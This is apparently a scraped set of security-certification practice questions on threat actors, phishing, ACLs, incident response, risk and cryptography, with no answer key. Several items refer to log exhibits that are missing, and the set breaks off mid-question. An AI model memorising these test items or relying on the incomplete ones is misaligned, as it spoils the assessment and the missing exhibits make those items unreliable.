Which of the following threat actors is the most likely to be hired by a foreign government to attack critical

systems located in other countries?

• A. Hacktivist

• B. Whistleblower

• C. Organized crime

• D. Unskilled attacker

Which of the following is used to add extra complexity before using a one-way data transformation
algorithm?

• A. Key stretching

• B. Data masking

• C. Steganography

• D. Salting

An employee clicked a link in an email from a payment website that asked the employee to update contact
information. The employee entered the log-in information but received a “page not found” error message.
Which of the following types of social engineering attacks occurred?

• A. Brand impersonation

• B. Pretexting

• C. Typosquatting

• D. Phishing

n enterprise is trying to limit outbound DNS traffic originating from its internal network. Outbound DNS
requests will only be allowed from one device with the IP address 10.50.10.25. Which of the following
firewall ACLs will accomplish this goal?

• A. Access list outbound permit 0.0.0.0/0 0.0.0.0/0 port 53

Access list outbound deny 10.50.10.25/32 0.0.0.0/0 port 53

• B. Access list outbound permit 0.0.0.0/0 10.50.10.25/32 port 53

Access list outbound deny 0.0.0.0/0 0.0.0.0/0 port 53

• C. Access list outbound permit 0.0.0.0/0 0.0.0.0/0 port 53

Access list outbound deny 0.0.0.0/0 10.50.10.25/32 port 53

• D. Access list outbound permit 10.50.10.25/32 0.0.0.0/0 port 53

Access list outbound deny 0.0.0.0/0 0.0.0.0/0 port 53

The term "CIA triad" is used to describe the basic principles of information security.

• True

• False
A data administrator is configuring authentication for a SaaS application and would like to reduce the
number of credentials employees need to maintain. The company prefers to use domain credentials
to access new SaaS applications. Which of the following methods would allow this
functionality?

• A. SSO

• B. LEAP

• C. MFA

• D. PEAP

Which of the following scenarios describes a possible business email compromise attack?

• A. An employee receives a gift card request in an email that has an executive’s name in the
display field of the email.

• B. Employees who open an email attachment receive messages demanding payment in

order to access files.

• C. A service desk employee receives an email from the HR director asking for log-in
credentials to a cloud administrator account.

• D. An employee receives an email with a link to a phishing site that is designed to look like the
company’s email portal.

A company prevented direct access from the database administrators’ workstations to the network
segment that contains database servers. Which of the following should a database administrator use
to access the database servers?

• A. Jump server

• B. RADIUS

• C. HSM

• D. Load balancer

An organization’s internet-facing website was compromised when an attacker exploited a buffer

overflow. Which of the following should the organization deploy to best protect against similar attacks
in the future?

• A. NGFW

• B. WAF

• C. TLS

• D. SD-WAN
An administrator notices that several users are logging in from suspicious IP addresses. After
speaking with the users, the administrator determines that the employees were not logging in from
those IP addresses and resets the affected users’ passwords. Which of the following should the
administrator implement to prevent this type of attack from succeeding in the future?

• A. Multifactor authentication

• B. Permissions assignment

• C. Access management

• D. Password complexity

An employee receives a text message that appears to have been sent by the payroll department and is
asking for credential verification. Which of the following social engineering techniques are being
attempted? (Choose two.)

• A. Typosquatting

• B. Phishing

• C. Impersonation

• D. Vishing

• E. Smishing

• F. Misinformation

Several employees received a fraudulent text message from someone claiming to be the Chief Executive
Officer (CEO). The message stated:
“I’m in an airport right now with no access to email. I need you to buy gift cards for employee recognition
awards. Please send the gift cards to following email address.”
Which of the following are the best responses to this situation? (Choose two).

• A. Cancel current employee recognition gift cards.

• B. Add a smishing exercise to the annual company training.

• C. Issue a general email warning to the company.

• D. Have the CEO change phone numbers.

• E. Conduct a forensic investigation on the CEO’s phone.

• F. Implement mobile device management.

A company is required to use certified hardware when building networks. Which of the following best
addresses the risks associated with procuring counterfeit hardware?

• A. A thorough analysis of the supply chain

• B. A legally enforceable corporate acquisition policy

• C. A right to audit clause in vendor contracts and SOWs

• D. An in-depth penetration test of all suppliers and vendors

Which of the following provides the details about the terms of a test with a third-party penetration tester?

• A. Rules of engagement

• B. Supply chain analysis

• C. Right to audit clause

• D. Due diligence

A penetration tester begins an engagement by performing port and service scans against the client
environment according to the rules of engagement. Which of the following reconnaissance types is the
tester performing?

• A. Active

• B. Passive

• C. Defensive

• D. Offensive

Which of the following is required for an organization to properly manage its restore process in the event of
system failure?

• A. IRP

• B. DRP

• C. RPO

• D. SDLC

Which of the following vulnerabilities is associated with installing software outside of a manufacturer’s
approved software repository?

• A. Jailbreaking

• B. Memory injection

• C. Resource reuse

• D. Side loading

An analyst is evaluating the implementation of Zero Trust principles within the data plane. Which of the
following would be most relevant for the analyst to evaluate?

• A. Secured zones

• B. Subject role

• C. Adaptive identity

• D. Threat scope reduction

An engineer needs to find a solution that creates an added layer of security by preventing
unauthorized access to internal company resources. Which of the following would be the best
solution?

• A. RDP server

• B. Jump server

• C. Proxy server

• D. Hypervisor

A company’s web filter is configured to scan the URL for strings and deny access when matches are
found. Which of the following search strings should an analyst employ to prohibit access to non-
encrypted websites?

• A. encryption=off

• B. http://

• C. www.*.com

• D. :443

During a security incident, the security operations team identified sustained network traffic from a
malicious IP address: 10.1.4.9. A security analyst is creating an inbound firewall rule to block the IP
address from accessing the organization’s network. Which of the following fulfills this request?

• A. access-list inbound deny ip source 0.0.0.0/0 destination 10.1.4.9/32

• B. access-list inbound deny ip source 10.1.4.9/32 destination 0.0.0.0/0

• C. access-list inbound permit ip source 10.1.4.9/32 destination 0.0.0.0/0

• D. access-list inbound permit ip source 0.0.0.0/0 destination 10.1.4.9/32

A company needs to provide administrative access to internal resources while minimizing the traffic
allowed through the security boundary. Which of the following methods is most secure?

• A. Implementing a bastion host

• B. Deploying a perimeter network

• C. Installing a WAF

• D. Utilizing single sign-on

A security analyst is reviewing alerts in the SIEM related to potential malicious network traffic coming
from an employee’s corporate laptop. The security analyst has determined that additional data about
the executable running on the machine is necessary to continue the investigation.
Which of the following logs should the analyst use as a data source?

• A. Application

• B. IPS/IDS

• C. Network D. Endpoint
A cyber operations team informs a security analyst about a new tactic malicious actors are using to
compromise networks.
SIEM alerts have not yet been configured. Which of the following best describes what the security analyst
should do to identify this behavior?

• A. Digital forensics

• B. E-discovery

• C. Incident response

• D. Threat hunting

A company purchased cyber insurance to address items listed on the risk register. Which of the following
strategies does this represent?

• A. Accept

• B. Transfer

• C. Mitigate

• D. Avoid

A security administrator would like to protect data on employees’ laptops. Which of the following encryption
techniques should the security administrator use?

• A. Partition

• B. Asymmetric

• C. Full disk

• D. Database

Which of the following security control types does an acceptable use policy best represent?

• A. Detective

• B. Compensating

• C. Corrective

• D. Preventive

An IT manager informs the entire help desk staff that only the IT manager and the help desk lead will
have access to the administrator console of the help desk software. Which of the following security
techniques is the IT manager setting up?

• A. Hardening

• B. Employee monitoring

• C. Configuration enforcement

• D. Least privilege
Which of the following is the most likely to be used to document risks, responsible parties, and thresholds?

• A. Risk tolerance

• B. Risk transfer

• C. Risk register

• D. Risk analysis

Which of the following should a security administrator adhere to when setting up a new set of firewall
rules?

• A. Disaster recovery plan

• B. Incident response procedure

• C. Business continuity plan

• D. Change management procedure

A company is expanding its threat surface program and allowing individuals to security test the company’s
internet-facing application. The company will compensate researchers based on the vulnerabilities
discovered. Which of the following best describes the program the company is
setting up?

• A. Open-source intelligence

• B. Bug bounty

• C. Red team

• D. Penetration testing

Which of the following threat actors is the most likely to use large financial resources to attack critical
systems located in other countries?

• A. Insider

• B. Unskilled attacker

• C. Nation-state

• D. Hacktivist

Which of the following enables the use of an input field to run commands that can view or manipulate
data?

• A. Cross-site scripting

• B. Side loading

• C. Buffer overflow

• D. SQL injection
Employees in the research and development business unit receive extensive training to ensure they
understand how to best protect company data. Which of the following is the type of data these
employees are most likely to use in day-to-day work activities?

• A. Encrypted

• B. Intellectual property

• C. Critical

• D. Data in transit

A company has begun labeling all laptops with asset inventory stickers and associating them with
employee IDs. Which of the following security benefits do these actions provide? (Choose two.)

• A. If a security incident occurs on the device, the correct employee can be notified.

• B. The security team will be able to send user awareness training to the appropriate device.

• C. Users can be mapped to their devices when configuring software MFA tokens.

• D. User-based firewall policies can be correctly targeted to the appropriate laptops.

• E. When conducting penetration testing, the security team will be able to target the desired
laptops.

• F. Company data can be accounted for when the employee leaves the organization.

A technician wants to improve the situational and environmental awareness of existing users as they
transition from remote to in-office work. Which of the following is the best option?

• A. Send out periodic security reminders.

• B. Update the content of new hire documentation.

• C. Modify the content of recurring training.

• D. Implement a phishing campaign.

A newly appointed board member with cybersecurity knowledge wants the board of directors to receive a
quarterly report detailing the number of incidents that impacted the organization. The systems administrator
is creating a way to present the data to the board of directors. Which of the following should the systems
administrator use?

• A. Packet captures

• B. Vulnerability scans

• C. Metadata

• D. Dashboard

A systems administrator receives the following alert from a file integrity monitoring tool: The hash
of the cmd.exe file has changed.
The systems administrator checks the OS logs and notices that no patches were applied in the last
two months. Which of the following most likely occurred?
 • A. The end user changed the file permissions.

• B. A cryptographic collision was detected.

• C. A snapshot of the file system was taken.

• D. A rootkit was deployed.

Which of the following roles, according to the shared responsibility model, is responsible for securing
the company’s database in an IaaS model for a cloud environment?

• A. Client

• B. Third-party vendor

• C. Cloud provider

• D. DBA

A client asked a security company to provide a document outlining the project, the cost, and the
completion time frame. Which of the following documents should the company provide to the client?

• A. MSA

• B. SLA

• C. BPA

• D. SOW

A security team is reviewing the findings in a report that was delivered after a third party performed a
penetration test. One of the findings indicated that a web application form field is
vulnerable to cross-site scripting. Which of the following application security techniques should the
security analyst recommend the developer implement to prevent this vulnerability?

• A. Secure cookies

• B. Version control

• C. Input validation

• D. Code signing

Which of the following must be considered when designing a high-availability network? (Choose two).

• A. Ease of recovery

• B. Ability to patch

• C. Physical isolation

• D. Responsiveness

• E. Attack surface

• F. Extensible authentication
A technician needs to apply a high-priority patch to a production system. Which of the following steps
should be taken first?

• A. Air gap the system.

• B. Move the system to a different network segment.

• C. Create a change control request.

• D. Apply the patch to the system.

Which of the following describes the reason root cause analysis should be conducted as part of incident
response?

• A. To gather IoCs for the investigation

• B. To discover which systems have been affected

• C. To eradicate any trace of malware on the network

• D. To prevent future incidents of the same nature

Which of the following is the most likely outcome if a large bank fails an internal PCI DSS compliance
assessment?

• A. Fines

• B. Audit findings

• C. Sanctions

• D. Reputation damage

A company is developing a business continuity strategy and needs to determine how many staff members
would be required to sustain the business in the case of a disruption. Which of the following best
describes this step?

• A. Capacity planning

• B. Redundancy

• C. Geographic dispersion

• D. Tabletop exercise

A company’s legal department drafted sensitive documents in a SaaS application and wants to ensure
the documents cannot be accessed by individuals in high-risk countries. Which of the following is
the most effective way to limit this access?

• A. Data masking

• B. Encryption

• C. Geolocation policy

• D. Data sovereignty regulation

Which of the following is a hardware-specific vulnerability?

 • A. Firmware version

• B. Buffer overflow

• C. SQL injection

• D. Cross-site scripting

While troubleshooting a firewall configuration, a technician determines that a“deny any”policy should
be added to the bottom of the ACL. The technician updates the policy, but the new policy causes
several company servers to become unreachable.
Which of the following actions would prevent this issue?

• A. Documenting the new policy in a change request and submitting the request to change
management

• B. Testing the policy in a non-production environment before enabling the policy in the
production network

• C. Disabling any intrusion prevention signatures on the “deny any”policy prior to enabling the
new policy

• D. Including an “allow any” policy above the “deny any” policy

An organization is building a new backup data center with cost-benefit as the primary requirement and
RTO and RPO values around two days. Which of the following types of sites is the best for this scenario?

• A. Real-time recovery

• B. Hot

• C. Cold

• D. Warm

A company requires hard drives to be securely wiped before sending decommissioned systems to
recycling. Which of the following best describes this policy?

• A. Enumeration

• B. Sanitization

• C. Destruction

• D. Inventory

A systems administrator works for a local hospital and needs to ensure patient data is protected and
secure. Which of the following data classifications should be used to secure patient data?

• A. Private

• B. Critical

• C. Sensitive

• D. Public
A U.S.-based cloud-hosting provider wants to expand its data centers to new international locations.
Which of the following should the hosting provider consider first?

• A. Local data protection regulations

• B. Risks from hackers residing in other countries

• C. Impacts to existing contractual obligations

• D. Time zone differences in log correlation

Which of the following would be the best way to block unknown programs from executing?

• A. Access control list

• B. Application allow list

• C. Host-based firewall

• D. DLP solution

A company hired a consultant to perform an offensive security assessment covering penetration testing
and social engineering.
Which of the following teams will conduct this assessment activity?

• A. White

• B. Purple

• C. Blue

• D. Red

A software development manager wants to ensure the authenticity of the code created by the company.
Which of the following options is the most appropriate?

• A. Testing input validation on the user input fields

• B. Performing code signing on company-developed software

• C. Performing static code analysis on the software

• D. Ensuring secure cookies are use

Which of the following can be used to identify potential attacker activities without affecting production
servers?

• A. Honeypot

• B. Video surveillance

• C. Zero Trust

• D. Geofencing

During an investigation, an incident response team attempts to understand the source of an incident.
Which of the following incident response activities describes this process?

• A. Analysis
 • B. Lessons learned

• C. Detection

• D. Containment

A security practitioner completes a vulnerability assessment on a company’s network and finds

several vulnerabilities, which the operations team remediates. Which of the following should be done
next?

• A. Conduct an audit.

• B. Initiate a penetration test.

• C. Rescan the network.

• D. Submit a report.

An administrator was notified that a user logged in remotely after hours and copied large amounts of
data to a personal device.
Which of the following best describes the user’s activity?

• A. Penetration testing

• B. Phishing campaign

• C. External audit

• D. Insider threat

Which of the following allows for the attribution of messages to individuals?

• A. Adaptive identity

• B. Non-repudiation

• C. Authentication

• D. Access logs

Which of the following is the best way to consistently determine on a daily basis whether security settings on
servers have been modified?

• A. Automation

• B. Compliance checklist

• C. Attestation

• D. Manual audit

Which of the following tools can assist with detecting an employee who has accidentally emailed a file
containing a customer’s PII?

• A. SCAP

• B. NetFlow

• C. Antivirus
 • D. DLP

An organization recently updated its security policy to include the following statement:
Regular expressions are included in source code to remove special characters such as $, |, ;. C, `, and ?
from variables set by forms in a web application.
Which of the following best explains the security technique the organization adopted by making this
addition to the policy?

• A. Identify embedded keys

• B. Code debugging

• C. Input validation

• D. Static code analysis

A security analyst and the management team are reviewing the organizational performance of a
recent phishing campaign. The user click-through rate exceeded the acceptable risk threshold, and
the management team wants to reduce the impact when a user clicks on a link in a phishing
message. Which of the following should the analyst do?

• A. Place posters around the office to raise awareness of common phishing activities.

• B. Implement email security filters to prevent phishing emails from being delivered.

• C. Update the EDR policies to block automatic execution of downloaded programs.

• D. Create additional training for users to recognize the signs of phishing attempts.

Which of the following has been implemented when a host-based firewall on a legacy Linux system
allows connections from only specific internal IP addresses?

• A. Compensating control

• B. Network segmentation

• C. Transfer of risk

• D. SNMP traps

The management team notices that new accounts that are set up manually do not always have correct
access or permissions.
Which of the following automation techniques should a systems administrator use to streamline account
creation?

• A. Guard rail script

• B. Ticketing workflow

• C. Escalation script

• D. User provisioning script

A company is planning to set up a SIEM system and assign an analyst to review the logs on a weekly
basis. Which of the following types of controls is the company setting up?

• A. Corrective

• B. Preventive

• C. Detective

• D. Deterrent

A systems administrator is looking for a low-cost application-hosting solution that is cloud-based.

Which of the following meets these requirements?

• A. Serverless framework

• B. Type 1 hypervisor

• C. SD-WAN

• D. SDN

A security operations center determines that the malicious activity detected on a server is normal. Which of
the following activities describes the act of ignoring detected activity in the future?

• A. Tuning

• B. Aggregating

• C. Quarantining

• D. Archiving

A security analyst reviews domain activity logs and notices the following:

Which of the following is the best explanation for what the security analyst has discovered?

• A. The user jsmith’s account has been locked out.

• B. A keylogger is installed on jsmith’s workstation.

• C. An attacker is attempting to brute force jsmith’s account.

• D. Ransomware has been deployed in the domain.

A company is concerned about weather events causing damage to the server room and downtime.
Which of the following should the company consider?

• A. Clustering servers

• B. Geographic dispersion

• C. Load balancers
 • D. Off-site backups

Which of the following is a primary security concern for a company setting up a BYOD program?

• A. End of life

• B. Buffer overflow

• C. VM escape

• D. Jailbreaking

A company decided to reduce the cost of its annual cyber insurance policy by removing the coverage
for ransomware attacks.
Which of the following analysis elements did the company most likely use in making this decision?

• A. MTTR

• B. RTO

• C. ARO

• D. MTBF

Which of the following is the most likely to be included as an element of communication in a security
awareness program?

• A. Reporting phishing attempts or other suspicious activities

• B. Detecting insider threats using anomalous behavior recognition

• C. Verifying information when modifying wire transfer data

• D. Performing social engineering as part of third-party penetration testing

Which access control model allows for defining granular rules that consider user roles, time constraints,
and network access restrictions?

• ABAC

• MAC

• RuBAC

• DAC

• RBAC

Which type of control access model connects user permissions to their specific responsibilities?

• DAC

• RBAC

• MAC

• ABAC
HOTSPOT -
Select the appropriate attack and remediation from each drop-down list to label the corresponding
attack with its remediation.

INSTRUCTIONS -
Not all attacks and remediation actions will be used.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All
button.
HOTSPOT -
You are a security administrator investigating a potential infection on a network.

INSTRUCTIONS -
Click on each host and firewall. Review all logs to determine which host originated the infection and
then identify if each remaining host is clean or infected.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All
button
Which of the following is the phase in the incident response process when a security analyst
reviews roles and responsibilities?

• A. Preparation

• B. Recovery

• C. Lessons learned

• D. Analysis

After a recent vulnerability scan, a security engineer needs to harden the routers within the corporate
network. Which of the following is the most appropriate to disable?

• A. Console access

• B. Routing protocols

• C. VLANs

• D. Web-based administration
A security administrator needs a method to secure data in an environment that includes some form
of checks so track any changes. Which of the following should the administrator set up to achieve
this goal?

• A. SPF

• B. GPO

• C. NAC

• D. FIM

An administrator is reviewing a single server's security logs and discovers the following:

Which of the following best describes the action captured in this log file?

• A. Brute-force attack

• B. Privilege escalation

• C. Failed password audit

• D. Forgotten password by the user

A security engineer is implementing FDE for all laptops in an organization. Which of the following are the
most important for the engineer to consider as part of the planning process? (Choose two.)

• A. Key escrow

• B. TPM presence

• C. Digital signatures

• D. Data tokenization

• E. Public key management

• F. Certificate authority linking

A security analyst scans a company's public network and discovers a host is running a remote
desktop that can be used to access the production network. Which of the following changes should
the security analyst recommend?

• A. Changing the remote desktop port to a non-standard number

• B. Setting up a VPN and placing the jump server inside the firewall

• C. Using a proxy for web connections from the remote desktop server

• D. Connecting the remote server to the domain and increasing the password length

An enterprise has been experiencing attacks focused on exploiting vulnerabilities in older browser
versions with well-known exploits. Which of the following security solutions should be configured to
best provide the ability to monitor and block these known signature-based attacks?

• A. ACL

• B. DLP

• C. IDS

• D. IPS

Security controls in a data center are being reviewed to ensure data is properly protected and that human life
considerations are included. Which of the following best describes how the controls should be set up?

• A. Remote access points should fail closed.

• B. Logging controls should fail open.

• C. Safety controls should fail open.

• D. Logical security controls should fail closed.

Which of the following would be best suited for constantly changing environments?

• A. RTOS

• B. Containers
 • C. Embedded systems D. SCADA

Which of the following incident response activities ensures evidence is properly handled?

• A. E-discovery

• B. Chain of custody

• C. Legal hold

• D. Preservation

An accounting clerk sent money to an attacker's bank account after receiving fraudulent
instructions to use a new account. Which of the following would most likely prevent this activity in the
future?

• A. Standardizing security incident reporting

• B. Executing regular phishing campaigns

• C. Implementing insider threat detection measures

• D. Updating processes for sending wire transfers

A systems administrator is creating a script that would save time and prevent human error when
performing account creation for a large number of end users. Which of the following would be a good
use case for this task?

• A. Off-the-shelf software

• B. Orchestration

• C. Baseline

• D. Policy enforcement

A company's marketing department collects, modifies, and stores sensitive customer data. The
infrastructure team is responsible for securing the data while in transit and at rest. Which of the
following data roles describes the customer?

• A. Processor

• B. Custodian

• C. Subject

• D. Owner

Which of the following describes the maximum allowance of accepted risk?

• A. Risk indicator

• B. Risk level

• C. Risk score

• D. Risk threshold
A security analyst receives alerts about an internal system sending a large amount of unusual DNS
queries to systems on the internet over short periods of time during non-business hours. Which of
the following is most likely occurring?

• A. A worm is propagating across the network.

• B. Data is being exfiltrated.

• C. A logic bomb is deleting data.

• D. Ransomware is encrypting files.

A technician is opening ports on a firewall for a new system being deployed and supported by a SaaS
provider. Which of the following is a risk in the new system?

• A. Default credentials

• B. Non-segmented network

• C. Supply chain vendor

• D. Vulnerable software

A systems administrator is working on a solution with the following requirements:

• Provide a secure zone.
• Enforce a company-wide access control policy.
• Reduce the scope of threats.
Which of the following is the systems administrator setting up?

• A. Zero Trust

• B. AAA

• C. Non-repudiation

• D. CIA

Which of the following involves an attempt to take advantage of database misconfigurations?

• A. Buffer overflow

• B. SQL injection

• C. VM escape

• D. Memory injection

Which of the following is used to validate a certificate when it is presented to a user?

• A. OCSP

• B. CSR

• C. CA

• D. CRC
Which of the following acronyms refers to any type of information pertaining to an individual that can be
used to uniquely identify that person?

• PHI

• PIV

• PII

• PKI

An authentication subsystem that enables a user to access multiple, connected system

components (such as separate hosts on a network) after a single login on only one of the
components is referred to as:

• NAC

• SSO

• AAA

• MFA

Which of the cryptographic algorithms listed below is the least vulnerable to attacks?

• AES

• DES

• RC4

• 3DES

Which of the following answers illustrates the difference between passive and active network
security breach response?

• HIPS vs. NIPS

• UTM vs. Firewall

• NIPS vs. UTM

• IDS vs. IPS

An SELinux kernel security feature for implementing stricter access controls and policies is known as:

• DAC

• RBAC

• MAC

• ABAC

Which wireless security protocol has been deprecated in favor of newer standards due to known
vulnerabilities resulting from implementation flaws?

• EAP
 • AES

• WPA2

• WEP

One of a company's vendors sent an analyst a security bulletin that recommends a BIOS update.
Which of the following vulnerability types is being addressed by the patch?

• A. Virtualization

• B. Firmware

• C. Application

• D. Operating system

Which of the following is used to quantitatively measure the criticality of a vulnerability?

• A. CVE

• B. CVSS

• C. CIA

• D. CERT

Which of the following actions could a security engineer take to ensure workstations and servers are
properly monitored for unauthorized changes and software?

• A. Configure all systems to log scheduled tasks.

• B. Collect and monitor all traffic exiting the network.

• C. Block traffic based on known malicious signatures.

• D. Install endpoint management software on all systems

An organization is leveraging a VPN between its headquarters and a branch location. Which of the following
is the VPN protecting?

• A. Data in use

• B. Data in transit

• C. Geographic restrictions

• D. Data sovereignty

The US Health Insurance Portability and Accountability Act (HIPAA) provides privacy protection for:
(Select best answer)

• PII

• ESN
 • PHI

• PIV

Which of the answers listed below refers to a hierarchical system for the creation, management, storage,
distribution, and revocation of digital certificates?

• PKI

• RA

• PKCS

• CA

After reviewing the following vulnerability scanning report:

A security analyst performs the following test:

Which of the following would the security analyst conclude for this reported vulnerability?

• A. It is a false positive.

• B. A rescan is required.

• C. It is considered noise.

• D. Compensating controls exist.

An organization disabled unneeded services and placed a firewall in front of a business-critical legacy
system. Which of the following best describes the actions taken by the organization?

• A. Exception

• B. Segmentation

• C. Risk transfer

• D. Compensating controls

A security consultant needs secure, remote access to a client environment. Which of the following
should the security consultant most likely use to gain access?

• A. EAP
 • B. DHCP

• C. IPSec

• D. NAT

Which of the following should a systems administrator use to ensure an easy deployment of
resources within the cloud provider?

• A. Software as a service

• B. Infrastructure as code

• C. Internet of Things

• D. Software-defined networking

After a security awareness training session, a user called the IT help desk and reported a
suspicious call. The suspicious caller stated that the Chief Financial Officer wanted credit card
information in order to close an invoice. Which of the following topics did the user recognize from the
training?

• A. Insider threat

• B. Email phishing

• C. Social engineering

• D. Executive whaling

A security administrator is deploying a DLP solution to prevent the exfiltration of sensitive customer
data. Which of the following should the administrator do first?

• A. Block access to cloud storage websites.

• B. Create a rule to block outgoing email attachments.

• C. Apply classifications to the data.

• D. Remove all user permissions from shares on the file server.

An administrator assists the legal and compliance team with ensuring information about customer
transactions is archived for the proper time period. Which of the following data policies is the
administrator carrying out?

• A. Compromise

• B. Retention

• C. Analysis

• D. Transfer

• E. Inventory

A company is working with a vendor to perform a penetration test. Which of the following includes an
estimate about the number of hours required to complete the engagement?
 • A. SOW

• B. BPA

• C. SLA

• D. NDA

A Chief Information Security Officer (CISO) wants to explicitly raise awareness about the increase of
ransomware-as-a-service in a report to the management team. Which of the following best describes
the threat actor in the CISO’s report?

• A. Insider threat

• B. Hacktivist

• C. Nation-state

• D. Organized crime

Which of the following practices would be best to prevent an insider from introducing malicious code
into a company's development process?

• A. Code scanning for vulnerabilities

• B. Open-source component usage

• C. Quality assurance testing

• D. Peer review and approval

Which of the following can best protect against an employee inadvertently installing malware on a company
system?

• A. Host-based firewall

• B. System isolation

• C. Least privilege

• D. Application allow list

A company is adding a clause to its AUP that states employees are not allowed to modify the
operating system on mobile devices. Which of the following vulnerabilities is the organization
addressing?

• A. Cross-site scripting

• B. Buffer overflow

• C. Jailbreaking

• D. Side loading

Which of the following would be the best ways to ensure only authorized personnel can access a
secure facility? (Choose two.)

• A. Fencing
 • B. Video surveillance

• C. Badge access

• D. Access control vestibule

• E. Sign-in sheet

• F. Sensor

What is the name of a network protocol that secures web traffic via SSL/TLS encryption?

• SFTP

• HTTPS

• FTPS

• SHTTP

The purpose of PCI DSS is to provide protection for:

• Credit cardholder data

• Licensed software

• User passwords

• Personal health information

Which term describes the predicted loss of value to an asset based on a single security incident?

• SLE

• ARO

• ALE

• SLA

Which of the following acronyms refers to a software that provides the functionality of a physical computer?

• SDN

• SaaS

• VM

• SoC

What is the common term for a group of protocols used to carry voice data over a packet- switched
network?

• ISDN

• PBX

• VoIP
 • PSTN

Which of the terms listed below refers to a formal contract between business partners outlining the
rights, responsibilities, and obligations of each partner regarding the management, operation, and
decision-making processes within the business?

• MSA

• SLA

• BPA

• MOA

Which of the following file transfer protocols does not provide encryption?

• SCP

• FTPS

• FTP

• SFTP

An organization would like to store customer data on a separate part of the network that is not accessible to
users on the main corporate network. Which of the following should the
administrator use to accomplish this goal?

• A. Segmentation

• B. Isolation

• C. Patching

• D. Encryption

Which of the following is the most common data loss path for an air-gapped network?

• A. Bastion host

• B. Unsecured Bluetooth

• C. Unpatched OS

• D. Removable devices

Malware spread across a company's network after an employee visited a compromised industry blog.
Which of the following best describes this type of attack?

• A. Impersonation

• B. Disinformation

• C. Watering-hole

• D. Smishing

An organization is struggling with scaling issues on its VPN concentrator and internet circuit due to
remote work. The organization is looking for a software solution that will allow it to reduce
traffic on the VPN and internet circuit, while still providing encrypted tunnel access to the data center and
monitoring of remote employee internet traffic. Which of the following will help
achieve these objectives?

• A. Deploying a SASE solution to remote employees

• B. Building a load-balanced VPN solution with redundant internet

• C. Purchasing a low-cost SD-WAN solution for VPN traffic

• D. Using a cloud provider to create additional VPN concentrators

Which of the following is the best reason to complete an audit in a banking environment?

• A. Regulatory requirement

• B. Organizational change

• C. Self-assessment requirement

• D. Service-level requirement

Which of the following security concepts is the best reason for permissions on a human resources
fileshare to follow the principle of least privilege?

• A. Integrity

• B. Availability

• C. Confidentiality

• D. Non-repudiation

Which of the following are cases in which an engineer should recommend the decommissioning of a
network device? (Choose two.)

• A. The device has been moved from a production environment to a test environment.

• B. The device is configured to use cleartext passwords.

• C. The device is moved to an isolated segment on the enterprise network.

• D. The device is moved to a different location in the enterprise.

• E. The device's encryption level cannot meet organizational standards.

• F. The device is unable to receive authorized updates.

A company is required to perform a risk assessment on an annual basis. Which of the following types
of risk assessments does this requirement describe?

• A. Continuous

• B. Ad hoc

• C. Recurring
 • D. One time

After a recent ransomware attack on a company's system, an administrator reviewed the log files. Which of
the following control types did the administrator use?

• A. Compensating

• B. Detective

• C. Preventive

• D. Corrective

Which of the following exercises should an organization use to improve its incident response process?

• A. Tabletop

• B. Replication

• C. Failover

• D. Recovery

Which of the following best ensures minimal downtime and data loss for organizations with critical
computing equipment located in earthquake-prone areas?

• A. Generators and UPS

• B. Off-site replication

• C. Redundant cold sites

• D. High availability networking

A newly identified network access vulnerability has been found in the OS of legacy IoT devices. Which of
the following would best mitigate this vulnerability quickly?

• A. Insurance

• B. Patching

• C. Segmentation

• D. Replacement

After an audit, an administrator discovers all users have access to confidential data on a file
server. Which of the following should the administrator use to restrict access to the data quickly?

• A. Group Policy

• B. Content filtering

• C. Data loss prevention

• D. Access control lists

A WAP is a specific type of AP that is used to create WLANs.

 • True

• False

Which of the answers listed below refers to a language used for creating and organizing the content of
web pages?

• HTML

• CSS

• JS

• HTTP

Which network protocol enables retrieving contents of an Internet page from a web server?

• SNMP

• HTTP

• SMTP

• IMAP

A client demands at least 99.99% uptime from a service provider's hosted security services.
Which of the following documents includes the information the service provider should return to the
client?

• A. MOA

• B. SOW

• C. MOU

• D. SLA

A company is discarding a classified storage array and hires an outside vendor to complete the disposal.
Which of the following should the company request from the vendor?

• A. Certification

• B. Inventory list

• C. Classification

• D. Proof of ownership

A company is planning a disaster recovery site and needs to ensure that a single natural disaster would not
result in the complete loss of regulated backup data. Which of the following should the company consider?

• A. Geographic dispersion

• B. Platform diversity

• C. Hot site

• D. Load balancing
A security analyst locates a potentially malicious video file on a server and needs to identify both the
creation date and the file's creator. Which of the following actions would most likely give the security
analyst the information required?

• A. Obtain the file's SHA-256 hash.

• B. Use hexdump on the file's contents.

• C. Check endpoint logs.

• D. Query the file's metadata.

A type of user identification mechanism used as a countermeasure against automated software

(such as network bots) is known as:

• MFA

• CAPTCHA

• ACL

• NIPS

Which of the following is the recommended replacement for DES?

• DSA

• RSA

• RC4

• AES

Which of the terms listed below refers to the process of creating and maintaining computer applications?

• RAD

• SDLC

• OOP

• SaaS

A type of firmware interface designed as a replacement for BIOS is called:

• UEFI

• GPT

• ACPI

• PXE

Which of the following answers refers to a network security solution providing a single point of protection
against various types of threats?

• IDP
 • AV

• UTM

• NGFW

A type of document stipulating rules of behavior to be followed by users of computers, networks, and
associated resources is called:

• SLA

• EULA

• AUP

• BPA

LDAP is an example of:

• Data encryption protocol

• Address resolution protocol

• Directory access protocol

• File exchange protocol

Which of the answers listed below refers to a suite of protocols used for connecting hosts on the
Internet?

• NetBIOS

• IPv4

• TCP/IP

• IPv6

The SMTP protocol is used for: (Select 2 answers)

• Sending email messages between mail servers

• Name resolution services

• Serving of web pages

• Retrieving email messages from mail servers

• Sending email messages from a client device

Which of the following answers refers to a data storage device equipped with hardware-level
encryption functionality?

• HSM

• TPM

• EFS

• SED
A documented plan outlining the steps that should be taken in each phase of a cybersecurity incident
is referred to as:

• DRP

• BCP

• IRP

• ERP

Which of the terms listed below refers to a company that provides Internet access?

• ISP

• CSP

• IdP

• MSP

As opposed to simple DoS attacks that usually are performed from a single system, a DDoS attack
uses multiple compromised computer systems to perform the attack against its target. The
intermediary systems that are used as platform for the attack (often referred to as zombies, and
collectively as a botnet) are the secondary victims of the DDoS attack.

• True

• False

A type of cryptographic network protocol for secure data communication, remote command-line
login, remote command execution, and other secure network services between two networked
computers is known as:

• RDP

• SSH

• Telnet

• SCP

Which of the following answers can be used to describe technical security controls? (Select 3
answers)

• Focused on protecting material assets

• Sometimes called logical security controls

• Executed by computer systems (instead of people)

• Also known as administrative controls

• Implemented with technology

• Primarily implemented and executed by people (as opposed to computer systems)

Which of the answers listed below refer to examples of technical security controls? (Select 3 answers)

• Security audits

• Encryption

• Organizational security policy

